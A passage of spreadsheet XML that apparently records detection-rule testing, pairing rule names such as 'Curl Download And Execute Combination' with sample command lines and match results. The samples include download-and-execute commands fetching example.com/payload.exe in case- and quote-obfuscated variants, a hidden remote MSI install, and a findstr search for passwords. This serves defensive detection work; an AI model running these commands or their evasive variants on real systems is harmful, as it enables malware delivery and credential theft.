      <c r="I384" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J384" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K384" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="15.75" customHeight="1" s="42">
      <c r="A385" s="44" t="n"/>
      <c r="B385" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C385" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D385" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E385" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I385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85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K385" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="386" ht="15.75" customHeight="1" s="42">
      <c r="A386" s="44" t="n"/>
      <c r="B386" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C386" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D386" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E386" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F386" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G386" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I386" s="44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86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K386" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="15.75" customHeight="1" s="42">
      <c r="A387" s="44" t="n"/>
      <c r="B387" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C387" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D387" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E387" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F387" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G387" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I387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87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K387" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="388" ht="15.75" customHeight="1" s="42">
      <c r="A388" s="43" t="n"/>
      <c r="B388" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C388" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D388" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E388" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F388" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G388" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I388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88" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K388" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="389" ht="15.75" customHeight="1" s="42">
      <c r="A389" s="43" t="n"/>
      <c r="B389" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C389" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D389" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E389" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H389" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I389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389" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K389" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="390" ht="15.75" customHeight="1" s="42">
      <c r="A390" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B390" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C390" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D390" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E390" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe http://example.com/payload.exe -o payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I390" s="43" t="n"/>
      <c r="J390" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K390" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="391" ht="15.75" customHeight="1" s="42">
      <c r="A391" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B391" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C391" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D391" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E391" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe --OuTPut payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I391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391" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K391" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="392" ht="15.75" customHeight="1" s="42">
      <c r="A392" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B392" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C392" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D392" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E392" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl http://example.com/payload.exe --output payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I392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392" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K392" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="393" ht="15.75" customHeight="1" s="42">
      <c r="A393" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B393" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C393" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D393" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E393" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe -"-output" payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I393" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination (21dd6d38-2b18-4453-9404-a0fe4a0cc288); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J393" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K393" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="394" ht="15.75" customHeight="1" s="42">
      <c r="A394" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B394" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C394" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D394" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E394" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H394" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I394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94" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K394" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="395" ht="15.75" customHeight="1" s="42">
      <c r="A395" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B395" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C395" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D395" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E395" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H395" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I395" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J395" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K395" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="15.75" customHeight="1" s="42">
      <c r="A396" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B396" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C396" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D396" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E396" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G396" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H396" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I396" s="43" t="inlineStr">
        <is>
          <t>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396" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K396" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="397" ht="15.75" customHeight="1" s="42">
      <c r="A397" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B397" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C397" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D397" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E397" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G397" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H397" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I397" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J397" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K397" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="398" ht="15.75" customHeight="1" s="42">
      <c r="A398" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B398" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C398" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D398" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E398" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F398" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G398" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H398" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I398" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J398" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K398" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="399" ht="15.75" customHeight="1" s="42">
      <c r="A399" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B399" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C399" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D399" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E399" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F399" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G399" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I399" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J399" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K399" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="400" ht="15.75" customHeight="1" s="42">
      <c r="A400" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B400" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C400" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D400" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E400" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -C "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F400" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G400" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I400" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J400" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K400" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="401" ht="15.75" customHeight="1" s="42">
      <c r="A401" s="44" t="n"/>
      <c r="B401" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C401" s="44" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D401" s="44" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E401" s="44" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I401" s="43" t="n"/>
      <c r="J401" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K401" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="402" ht="15.75" customHeight="1" s="42">
      <c r="A402" s="43" t="n"/>
      <c r="B402" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C402" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D402" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E402" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -W Hidden -C "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u,'')"</t>
        </is>
      </c>
      <c r="F402" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I402" s="43" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Rename Of Highly Relevant Binaries (0ba1da6d-b6ce-4366-828c-18826c9de23e); PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J402" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K402" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="403" ht="15.75" customHeight="1" s="42">
      <c r="A403" s="43" t="n"/>
      <c r="B403" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C403" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D403" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E403" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I403" s="43" t="n"/>
      <c r="J403" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K403" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="404" ht="15.75" customHeight="1" s="42">
      <c r="A404" s="43" t="n"/>
      <c r="B404" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C404" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D404" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E404" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F404" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G404" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H404" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I404" s="43" t="n"/>
      <c r="J404" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K404" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="405" ht="15.75" customHeight="1" s="42">
      <c r="A405" s="43" t="n"/>
      <c r="B405" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C405" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D405" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E405" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I405" s="43" t="n"/>
      <c r="J405" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K405" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="406" ht="15.75" customHeight="1" s="42">
      <c r="A406" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B406" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C406" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D406" s="43" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E406" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe oledb32.dll,OpenDSLFile C:\Users\user\Downloads\test.udl</t>
        </is>
      </c>
      <c r="F406" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G406" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H406" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I406" s="43" t="n"/>
      <c r="J406" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K406" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="407" ht="15.75" customHeight="1" s="42">
      <c r="A407" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B407" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C407" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D407" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E407" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\admin\Downloads\test.udl"</t>
        </is>
      </c>
      <c r="F407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I407" s="43" t="n"/>
      <c r="J407" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K407" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="408" ht="15.75" customHeight="1" s="42">
      <c r="A408" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B408" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C408" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D408" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E408" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile C:\ProgramData\test.udl</t>
        </is>
      </c>
      <c r="F408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I408" s="43" t="n"/>
      <c r="J408" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K408" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="409" ht="15.75" customHeight="1" s="42">
      <c r="A409" s="44" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B409" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_run_local_rdp_file</t>
        </is>
      </c>
      <c r="C409" s="44" t="inlineStr">
        <is>
          <t>Mstsc.EXE Execution With Local RDP File</t>
        </is>
      </c>
      <c r="D409" s="44" t="inlineStr">
        <is>
          <t>5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af</t>
        </is>
      </c>
      <c r="E409" s="44" t="inlineStr">
        <is>
          <t>mstsc.exe "C:\Temp\hidden.rdp"</t>
        </is>
      </c>
      <c r="F409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I409" s="43" t="n"/>
      <c r="J409" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K409" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="410" ht="15.75" customHeight="1" s="42">
      <c r="A410" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B410" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_run_local_rdp_file</t>
        </is>
      </c>
      <c r="C410" s="44" t="inlineStr">
        <is>
          <t>Mstsc.EXE Execution With Local RDP File</t>
        </is>
      </c>
      <c r="D410" s="44" t="inlineStr">
        <is>
          <t>5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af</t>
        </is>
      </c>
      <c r="E410" s="44" t="inlineStr">
        <is>
          <t>mstsc.exe "C:\Users\Public\malicious.rdp" /f</t>
        </is>
      </c>
      <c r="F410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H410" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I410" s="43" t="n"/>
      <c r="J410" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K410" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="411" ht="15.75" customHeight="1" s="42">
      <c r="A411" s="43" t="n"/>
      <c r="B411" s="44" t="inlineStr">
        <is>
